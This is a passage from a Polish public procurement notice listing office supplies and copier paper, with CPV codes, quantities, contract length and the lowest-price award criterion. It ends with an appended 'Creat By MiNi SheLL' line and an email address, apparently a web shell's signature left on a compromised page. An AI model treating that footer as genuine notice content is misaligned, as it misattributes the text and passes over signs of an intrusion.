37	Marker do płyt CD DVD, grubość 0,5 mm, różne kolory.	30192125-3	szt	50					
38	Marker permamentny z okrągłą końcówką różne kolory	30192125-3	szt	600					
39	Notes samoprzylepny 38x51	22816300-6	szt	100					
40	Notes samoprzylepny 76x76mm 100 kartek.	22816300-6	szt	50					
41	Zakładka 4 kolorowa	30192800-9	szt	10					
42	Nożyczki do papieru, z plastikowym uchwytem, długość 21cm.	30190000-7	szt	30					
43	Okładka A4 do bindowania, skóropodobna, różne kolory, opakowanie a 100 sztuk.	30190000-7	op	45					
44	Okładka kanałowa AA,A,B,C - różne kolory	30190000-7	szt	450					
45	Okładki na dyplom A4, twarde, oklejane materiałem skóropodobnym, różne kolory.	30190000-7	szt	10					
46	Ołówek z gumką, HB.	30192130-1	szt	70					
47	Pióro kulkowe, różne kolory 0,5 mm.	30192121-5	szt	20					
48	Pisaki: 4 (cztery) kolory w opakowaniu, dwustronne, cienki   gruby.	30192125-3	op	20					
49	Pocztowa ksiazka nadawcza A-5	22800000-8	bl	25					
50	Rolka kasowa offset 57mm 30mb. - 10szt. w opakowaniu	30192350-9	op	5					
51	Rolka kasowa termiczna (28mm x 25m)	30192350-9	szt	500					
52	Segregator A4, szerokość 50mm, na dwa otwory.	30199500-5	szt	100					
53	Segregator A4, szerokość 30mm, na dwa otwory.	30199500-5	szt	50					
54	Segregator A4, szerokość 70mm, na dwa otwory.	30199500-5	szt	200					
55	Segregator A5, szerokość 70mm, na dwa otwory.	30199500-5	szt	50					
56	Skoroszyt A4, plastikowy, różne kolory.	22851000-0	szt	100					
57	Skoroszyt A4, plastikowy, różne kolory z mozliwością wpinania do segregatora	22851000-0	szt	200					
58	Spinacze biurowe okrągłe 28mm, opakowanie po 100 sztuk.	30197220-4	op	300					
59	Spinacze-klipsy 19mm, po 12 sztuk w opakowaniu.	30197220-4	op	25					
60	Spinacze-klipsy 25mm po 12 sztuk w opakowaniu.	30197220-4	op	25					
61	Spinacze-klipsy 32mm po 12 sztuk w opakowaniu.	30197220-4	op	20					
62	Spinacze-klipsy 41mm po 12 sztuk w opakowaniu.	30197220-4	op	10					
63	Spinacze-klipsy 51mm po 12 sztuk w opakowaniu.	30197220-4	op	10					
64	Tablica korkowa 100x80 cm.	30195000-2	szt	4					
65	Taśma dwustronna klejąca, szerokość min. 30mm 4mb.	44424200-0	szt	50					
66	Taśma pakowa 48mm 50 mb	44424200-0	szt	80					
67	Taśma przeźroczysta klejąca 18mm 20mb.	44424200-0	szt	50					
68	Teczka A4, skrzydłowa, kolorowa, zapinana na rzep, (tektura 750g).szerokosc 3,5cm 	30190000-7	szt	20					
69	Teczka A4, tekturowa z gumką, kolorowa (tektura 450g).	30190000-7	szt	500					
70	Teczka tekturowa z gumką biała 350g	30190000-7	szt	500					
71	Teczka A4, tekturowa, wiązana, biała (tektura 450g).	30190000-7	szt	100					
72	Teczka zawieszana 250g m2 	30190000-7	szt	300					
73	Teczka do podpisu 12 przegrudek	22800000-8	szt	10					
74	Terminarz A4 tydzień na dwóch stronach na 2013 rok	30196100-0	szt	5					
75	Terminarz A-5 jeden dzień na stronie na 2013 rok 	30196100-0	szt	150					
76	Tusz do stempli różne kolory, 30ml flakon	30190000-7	szt	70					
77	Zakreślacz, różne kolory.	30192125-3	szt	100					
78	Zeszyt A4, 96 kartek, kratka, z marginesem, oprawa twarda, szyty.	22815000-6	szt	100					
79	Zeszyt A5, 32 kartki, kratka, z marginesem, oprawa miękka.	22815000-6	szt	50					
80	Zeszyt A5, 60 kartek, kratka, z marginesem, oprawa miękka.	22815000-6	szt	50					
81	Zeszyt A5,96 kartek, kratka, z marginesem, oprawa twarda, szyty.	22815000-6	szt	100					
82	Zszywacz biurowy dla 100 zszywek 24 6, możliwość zszycia 20 kartek, 80 g m2.	30197320-5	szt	30					
83	Zszywki biurowe 24 6, 1000 szt. w opakowaniu.	30197100-7	op	400					
84	Stojak 3 szuflady metalowy	30193000-8	szt	5					
85	Zestaw na biurko5 elementow metalowy	30193000-8	szt	3					
86	Marker sucho ścieralny	30192125-3	kpl.	5					
87	Poduszka do stępli (różne kolory)	30192111-2	szt	10					
88	Szuflafda plastikowa na dokumenty	30193200-0	szt	20					
89	Cienkopis różne kolory	30192125-3	szt	100					
90	Okładka do termobindownicy mini	30192500-6	szt	100					
91	Przypinacze tablicowe 30 szt opak	30197100-7	szt	10					
92	Ofertówka z pcv	30190000-7	szt	150					
93	Skorowidz 3 4 A4	30190000-7	szt	5					
94	Antyrama A4	30190000-7	szt	30					
95	Blok techniczny A4 10 kartek	30197600-2	szt	10					
96	Folia do palet	30190000-7	szt	12					
97	Zastrugaczka metalowa 	30190000-7	szt	40					
98	Wkład do pistoletu polimer klej	30190000-7	szt	20					
99	Pistolet do kleju polimerowego	30190000-7	szt	2					
100	Plastelina (6 szt opak)	30190000-7	szt	5					
101	Tablica magnetyczna 60x90	30195920-7	szt	4					
102	Kartka okazyjna (okolicznościowa z kopertą)	22321000-6	szt	200					
103	Dyplom A4	30199500-5	szt	300					
104	Kartonwizytówkowy	30199730-5	szt	100					
105	Pinezka metalowa 30 szt tapicerskie	30190000-7	op	10					
106	Pojemnik do archiwicacji 100 mm	30190000-7	szt	50					
107	Pojemnik do archiwicacji 80 mm	30190000-7	szt	50					
108	Gumka recepturka	30190000-7	op	5					
109	Rozszywacz	30190000-7	szt	10					
110	Grzbiety plastikowe do bind 16 mm 100 szt	30190000-7	op	2					
111	Przekładka alfabetyczna A4 do segregatora	30190000-7	szt	5					
112	Niszczarka z funkcja niszczenia płyt CD	30191400-8	szt	4					
113	Bindownica kanałowa do szerokości C	30191000-4	szt	1					
114	Laminator A4 	30191000-4	szt	1					
115	Gilotyna ręczna do 10 kartek	30191000-4	szt	1					
Razem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.81.60.00-3, 30.19.21.50-7, 30.19.21.21-5, 22.82.20.00-0, 30.19.21.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAPIER KSEROGRAFICZNY I KOMPUTEROWY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Szczegółowa nazwa przedmiotu zamówienia	Kod CPV	JM	ILOŚĆ	kwota netto	wartość netto 	Stawka VAT (%)	wartość brutto	Nazwa handlowa  nr katalogowy
1	2	3	4	5	6	7	8		
1	Papier komputerowy perforowany 240 70g z nadrukiem kolorowym oryginał  kopia 1+0	3019933-02	op	25					
2	Papier komputerowy perforowany 240 70g z nadrukiem kolorowym oryginał 1+1 	30199330-2	op	35					
3	Papier komputerowy perforowany 240 70g z nadrukiem kolorowym oryginał 1+2 	30199330-2	op	30					
4	Papier komputerowy perforowany 360 70g 1+0 	30199330-2	op	1					
5	Papier Xero A4 80g m pakowany w ryzach po 500 kartek, białość CIE - 146	30197644-2	op	3000					
6	Papier Xero A3 80g m pakowany w ryzach po 500 kartek, białość CIE - 146	30197644-2	op	300					
7	Papier ksero A4 160 gr m2 pakowany w ryzach po 250 kartek biały	30197642-8	op	15					
8	Papier ksero A4 160 gr m2 pakowany w ryzach po 250 kartek kolor	30197642-8	op	6					
9	Papier xero A3 220 g 250 k biały	30197642-8	op	2					
RAZEM				

warunki graniczne dla pakietu nr 2


L.P.	    zestawienie warunków wymaganych dla papieru kserograficznego i komputerowego
	WARUNEK GRANICZNY	
PARAMETRY 
OFEROWANE
1	Papier xero:  winien zapewniać możliwość szybkiego druku, kopiowania jednostronnie i dwustronnie. Dla następujących urządzeń :  kserokopiarek wysoko nakładowych, faxów , drukarek laserowych i atramentowych,
	        TAK	
2	Papier xero ma mieć możliwość druku czarnobiałego i kolorowego	TAK	
3	Papier xero ma posiadać gramaturę 80 g m2, białość CIE 146 i być nie mieszany	TAK	
4	Składanka wielowarstwowa (papier samokopiujący - dot. papieru komputerowego) ma posiadać 5 letni okres gwarancji na zdolności kopiowania 25 lat na trwałość kopii, wszystkie rodzaje papieru mają być bezpieczne dla środowiska i poddawać się recyklingowi.	TAK.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.93.30-2, 30.19.93.30-2, 30.19.76.44-2, 30.19.76.42-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com